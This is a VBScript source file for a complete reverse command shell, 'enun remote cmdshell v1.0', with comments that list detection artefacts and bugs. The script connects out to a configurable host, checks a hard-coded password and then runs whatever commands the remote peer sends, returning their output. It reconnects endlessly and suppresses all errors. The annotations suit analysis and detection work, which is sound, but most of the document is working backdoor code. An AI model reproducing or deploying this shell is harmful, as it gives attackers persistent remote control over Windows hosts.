VBScript Enun Remote CMD Shell代码
'============================
' enun remote cmdshell v 1.0
'============================
option explicit
' Tunables. The three time values are passed to wscript.sleep or compared with
' millisecond counters, so they are in milliseconds.
const account_lock_time = 600000 'lockout duration after too many bad passwords: 10 minutes
const lockout_bad_count = 3 'number of failed password attempts that triggers the lockout
const default_wait_time = 1000 'default delay: 1 second
const default_time_out = 60000 'default idle timeout: 60 seconds
' Script-wide state: winsocket holds the Winsock control, srevdata the last data
' received from the peer. count is not referenced at script level in the visible
' code; controltimeout has a parameter of the same name.
public winsocket, srevdata, count
' Main loop of a reverse command shell. The script connects OUT to a host/port,
' asks the remote peer for a password, and then passes each line the peer sends
' to WScript.Shell.Exec, returning stdout/stderr over the same socket.
' Observable artefacts for detection and triage, all taken from the code below:
'   - a script host creating the "mswinsock.winsock" COM object and making an
'     outbound TCP connection (default 127.0.0.1:8090 when the config is empty);
'   - a config file ".\enunrc.ini" in the working directory with host=/port= lines;
'   - child processes spawned by the script host through wscript.shell Exec;
'   - cleartext banner strings on the wire ("is connected, enter password: ",
'     "logon success, welcome!", "@enun]#: ");
'   - a password hard-coded in the script and compared in cleartext.
' The outer do ... loop never exits, so the script keeps reconnecting.
do
' Every runtime error from here on is silently ignored (missing config file,
' failed connect, failed Exec, ...).
on error resume next
' --- Phase 1: (re)connect. 7 is the Winsock "connected" state.
' winsocket is still unset the first time this condition is evaluated; the script
' presumably relies on "on error resume next" to get past that - confirm.
do while (winsocket.state <> 7)
dim objectfso, getconfig, line, host, port, i
set winsocket = wscript.createobject("mswinsock.winsock")
set objectfso = createobject("scripting.filesystemobject")
' 1 = open for reading.
set getconfig = objectfso.opentextfile(".\enunrc.ini", 1)
' Only the first three lines of the config are read. A line containing "host" or
' "port" anywhere supplies the value after the first "=".
for i = 1 to 3
line = getconfig.readline
if instr(line,"host") > 0 then host = split(line, "=", -1, 1)(1)
if instr(line,"port") > 0 then port = split(line, "=", -1, 1)(1)
next
' Fallback endpoint when the config gave no value.
if (len(host) = 0) then host = "127.0.0.1"
if (len(port) = 0) then port = "8090"
' protocol 0 = TCP.
winsocket.protocol = 0
winsocket.remotehost = host
winsocket.remoteport = port
winsocket.connect
' Give the connect 5 seconds before the state is checked again.
wscript.sleep default_wait_time * 5
call trackscript(2, winsocket.state, winsocket.bytesreceived)
'step: 2
loop
' --- Phase 2: session. Runs while the socket is neither in error (9) nor closed (0).
do while (winsocket.state <> 9 and winsocket.state <> 0)
dim authkey, lockoutbadcount, timeout_m, timeout_n
timeout_n = 0
' The local host name is disclosed to the peer before any authentication.
winsocket.senddata winsocket.localhostname & " is connected, enter password: "
' Wait for the password; controltimeout sleeps 1 s per call and closes the socket
' when the counter reaches default_time_out.
do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
timeout_n = timeout_n + 1000
call controltimeout(timeout_n)
loop
winsocket.getdata authkey, vbstring
' The first LF-terminated line of the reply is compared with a hard-coded
' cleartext password. The text before chr(10) must match exactly, so a peer that
' sends CRLF would leave a trailing CR in the compared value.
if split(authkey, chr(10), -1, 1)(0) = "veteran" then
winsocket.senddata "logon success, welcome!" & vbcrlf
' srevdata is seeded with the password string, so the first pass of the loop
' below hands "veteran" to Exec; any resulting error is suppressed.
srevdata = "veteran"
' Command loop: entered while the receive buffer is empty and the socket is alive.
do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
dim shellobj, executes
set shellobj = createobject("wscript.shell")
' The first line of the peer's data is executed as a command line by the script
' host process; nothing filters or restricts what is run.
set executes = shellobj.exec(split(srevdata, chr(10), -1, 1)(0))
' Both output streams are sent back to the peer unmodified.
winsocket.senddata executes.stdout.readall
winsocket.senddata executes.stderr.readall
if (len(srevdata) > 0) then
' Something was received: reset the idle counter and print the prompt.
timeout_m = 0
winsocket.senddata vbcrlf & "[" & winsocket.localhostname & "@enun]#: "
else
' Nothing received: tick the idle timer until data arrives or the socket drops.
do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
timeout_m = timeout_m + 1000
call controltimeout(timeout_m)
loop
end if
' "exit" (case-insensitive, first four characters) closes the connection.
if (lcase(left(srevdata, 4)) = "exit") then winsocket.close
' Fetch the next command for the following pass.
winsocket.getdata srevdata, vbstring
wscript.sleep default_wait_time
call trackscript(5, winsocket.state, winsocket.bytesreceived)
'step: 5
loop
else
' Wrong password. lockoutbadcount is never initialised, so it starts as Empty
' (treated as 0); it is only reset in the lockout branch below.
lockoutbadcount = lockoutbadcount + 1
winsocket.senddata "logon fail: unknown user name or bad password." & vbcrlf
wscript.sleep default_wait_time
end if
if (lockoutbadcount = lockout_bad_count) then
' Third bad password: notify the peer, close, and stay idle for 10 minutes
' before the outer loop reconnects.
winsocket.senddata "failed too many times, the account has been locked!" & vbcrlf
wscript.sleep default_wait_time
winsocket.close
lockoutbadcount = 0
wscript.sleep account_lock_time
'lock the account
end if
call trackscript(3, winsocket.state, winsocket.bytesreceived)
'step: 3
loop
call trackscript(1, winsocket.state, winsocket.bytesreceived)
'step: 1
loop
'=======================
'control timeout.
'=======================
public sub controltimeout(count)
' One tick of the idle timer used by the wait loops in the main script.
' count: milliseconds accumulated by the caller (the callers add 1000 per call).
' Uses the script-level winsocket object; returns nothing.
' The comparison is an exact equality, so the close branch runs only on the call
' where count is exactly default_time_out (60000).
if count = default_time_out then
winsocket.senddata vbcrlf & "local server response timeout, please reconnect ..." & vbcrlf
wscript.sleep default_wait_time
winsocket.close
'If the controlling side sends no input for 60 seconds the connection is closed automatically; it can reconnect immediately.
else
' Not timed out yet: sleep one second so the caller polls about once per second.
wscript.sleep default_wait_time
end if
call trackscript(4, winsocket.state, winsocket.bytesreceived)
'step: 4
end sub
'=======================
'track script.
'=======================
public sub trackscript(mystep, statecode, bytesreceived)
' Debug trace: reports which step of the script just ran, the socket state code
' and the number of bytes waiting in the receive buffer.
' wscript.echo prints to the console under cscript.exe and shows a dialog under
' wscript.exe, so this trace is visible on the host running the script.
dim report
report = "mystep: " & mystep
report = report & ", statecode: " & statecode
report = report & ", received: " & bytesreceived & " bytes"
wscript.echo report
end sub